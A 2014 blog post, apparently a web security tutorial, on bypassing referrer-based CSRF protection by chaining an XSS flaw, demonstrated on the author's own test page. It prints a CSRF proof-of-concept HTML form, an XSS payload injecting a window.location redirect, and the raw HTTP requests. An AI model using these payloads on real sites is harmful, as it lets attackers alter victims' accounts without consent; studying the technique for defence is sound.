Monday 23 June 2014

Referrer CSRF Bypass ( Not Effective But Alternative )




Referrer CSRF Bypass ( Not Effective But Alternative )


=============================================


Hello all friends we are meeting again in very short time ;-)

Today we will see how we can bypass the Referrer CSRF Bypass

By using Chained Vulnerability..


So Lets Begin

========================================


* First What Is Referrer Based CSRF Protection "According To OWASP"



Although it is trivial to spoof the referer header on your own browser, it is impossible to do so in a CSRF attack. Checking the referer is a commonly used method of preventing CSRF on embedded network devices because it does not require a per-user state. This makes a referer a useful method of CSRF prevention when memory is scarce. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state which is required to keep track of a synchronization token.

However, checking the referer is considered to be a weaker from of CSRF protection. For example, open redirect vulnerabilities can be used to exploit GET-based requests that are protected with a referer check and some organizations or browser tools remove referrer headers as a form of data protection. There are also common implementation mistakes with referer checks. For example if the CSRF attack originates from an HTTPS domain then the referer will be omitted. In this case the lack of a referer

===================================================================================

So we knew that if on an application if there is no tokens then still he is secure from CSRF Attacks By using Referrer Based Protection, There is many ways to bypass to this protection. Recently Rahul Sasi Bro Has Shown How We Can Do Referrer Based CSRF Protection Bypass By Using Chained Vulnerability. but here i am describing what i have found , Hope you will like it .



======================================================================================



For demonstration purpose i have created my own php code on my own domain r00tsh3ll.com


Here is the first main page










You can see the Source Code Of This Page







* You can see the same source code at pastebin on this link

Lets move the attack and bypass technique

Here i have created a simple post request based two text box which will used for updating user information like his name and work
This is the simple HTTP Post request Of Updating User Name

POST /refcsrftest/referrer.php HTTP/1.1
Host: r00tsh3ll.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://r00tsh3ll.com/refcsrftest/referrer.php
Cookie: PHPSESSID=5a6a56a7e4e2e67bd1c89537b813388e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
name=Narendra+Bhati&work=Security+Analyst

==========================================

As you can see there is no csrf tokens exist for prevent CSRF Attacks. So Lets try to perform a CSRF Attacks

We Will Use Simple CSRF POC HTML

-------------------------------------------------------

<html>
<body>
<form name="myForm" form action="http://r00tsh3ll.com/refcsrftest/referrer.php" method="POST">
<input type="hidden" name="name" value="CSRF">
<input type="hidden" name="work" value="Attack Triaged">
<input type="submit" value="Submit form" />
</form>
</body>
</html>

---------------------------------------------------------------------------------------------------------------------

This html form will send a HTTP Post Request To" r00tsh3ll.com" . Hope it will Triaged

 In Response We Got This





Ooooops !!!! :o "Referrer Is Not Matched CSRF Attack Detected"

And This HTTP Request Was Sent When we executed out CSRF POC HTML Page






So our CSRF Attack Is Not Executed Properly And We Got This Shity Response ,The "Referrer.php" is actually protecting the Form To Be Submit From Unknown Or External Header, When We Submit Our Page The "Referrer.php" Says Is This Request Came From ". This Is The Shity Problem

r00tsh3ll.com" , Whaat :o No !!! Then Lets Destroy This Request And In Response We Got This Page




=============================================================================

As we read previously there are Referrer Based CSRF Security Is Deployed ,Which always looks for Referrer value that is the request is came from "r00tsh3ll.com(Valid Domain)" then it will execute it otherwise in response it give some kind error message



Here the cool part came

By using Chained Vulnerability we can Bypass The Referrer CSRF Bypass, Chained Vulnerability Like By Using Some Kind Of Other Vulnerability To Exploit Other Weakness In A System Or Application



So Here we will use XSS As Chained Vulnerability To Bypass This Protection , XSS Means Attacker Have Control On The Browser , And The Good News Is That , Referrer Is Also Issued By Browser To Server ,Bingoo ;-)



In some how we have to find out a xss vulnerability to exploit this,Like here i am using XSS Vulnerability to bypass this

Suppose here is an another parameter "id" which is vulnerable to XSS , Here i am injecting A XSS Payload Which Will Redirect User To Attacker Injected Page When The XSS Triaged

===================================================

POST /refcsrftest/referrer.php?id=<script type="text/javascript"><!--window.location="http://r00tsh3ll.com/refcsrftest/referrer.php?name=Narendra+ Bhati&work=Hacking";//--></script></head>

HTTP/1.1
Host: r00tsh3ll.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=5a6a56a7e4e2e67bd1c89537b813388e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

Content-Length: 29




Now here i am sending POST Parameter By Using GET Method Because many web application Accept POST Request As GET Request Even Facebook , Google , Difference Is Only One They Are Not Harm full ;-)



Now what will happened actually By When the XSS Will Triaged It Will Redirect Victim TO "http://r00tsh3ll.com/refcsrftest/referrer.php?name=Narendra+ Bhati&work=Hacking" Now Here "Referrer.php" Will Check The Is The Request Is Came From "r00tsh3ll.com" And The Answer  Is Big YES, Because We Have Redirected Victim To Original Page Where CSRF Will Triaged Along With XSS..
When This Redirection Will Happened The HTTP  Would Be Like This

GET /refcsrftest/referrer.php?name=Narendra+%20Bhati&work=Hacking HTTP/1.1
Host: r00tsh3ll.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://r00tsh3ll.com/refcsrftest/referrer.php
Cookie: PHPSESSID=5a6a56a7e4e2e67bd1c89537b813388e
Connection: keep-alive





=============================================================================



Here referrer will think that is the request came from "rootsh3ll.com" then it will check for the http referrer value and then he says Ohh Yaa Is .. Lets Execute It =D ;-)

"Referrer CSRF Bypass"









No comments:

Post a Comment